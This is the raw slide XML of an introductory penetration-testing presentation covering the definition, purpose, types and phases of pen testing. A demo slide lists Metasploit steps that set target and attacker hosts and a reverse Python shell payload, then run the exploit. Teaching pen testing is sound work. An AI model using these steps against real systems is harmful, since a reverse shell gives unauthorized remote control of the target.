            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304165" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>set rhost targe_Ip_address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304165" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>set lhost my_ip_address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi" sz="1800"/>
              <a:t>set SITEPATH /var/www/html</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi" sz="1800"/>
              <a:t>Show all payload to exploit: show payloads </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi" sz="1800"/>
              <a:t>set payload payload/cmd/unix/reverse_python</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Execute payload to exploit: run</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="12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Question &amp; Answers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Google Shape;130;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643700" y="1182888"/>
            <a:ext cx="5715000" cy="362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470900" y="907400"/>
            <a:ext cx="805815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Agenda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t> For Today</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What is Penetration Testing?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Why to perform a Penetration Testing?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t> Phases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>What tools are used for Penetration Testing?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Questions &amp; Answers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What is Penetration Testing?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Google Shape;70;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="869325" y="1435600"/>
            <a:ext cx="6362950" cy="323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What is Penetration Testing?</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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>nswering a simple question: “What would a cybercriminal do to harm my organization’ computer systems, applications, and network?“</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Pen Test is an exercise to identify vulnerabilities could be present in an Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>System, Network, Application or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>organization's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t> overall Information.</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Why do I Need a Penetration Test?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vi"/>
              <a:t>Test Security Controls — Gain insights into the overall health of your application, network, and physical security layers.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Find Real-World Vulnerabilities — Expose endpoints in your computer systems most susceptible to attacks from adversaries.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Ensure Compliance — Companies can maintain information security compliance with industry standards for penetration testing.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Reinforce Security Posture — Penetration testing assists businesses in prioritizing and addressing their vulnerability with a security program.</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Type of pen tests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Penetration testing types based on knowledge of the target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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1516525" y="1724700"/>
            <a:ext cx="4861825" cy="276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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>ypes based on the position of tester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1042638" y="1250500"/>
            <a:ext cx="7058724" cy="357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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>ypes based on where it is performed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="Google Shape;102;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624413" y="1265025"/>
            <a:ext cx="5895174"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Pen Test Phases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Google Shape;108;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="552875" y="1017713"/>
            <a:ext cx="7810500" cy="387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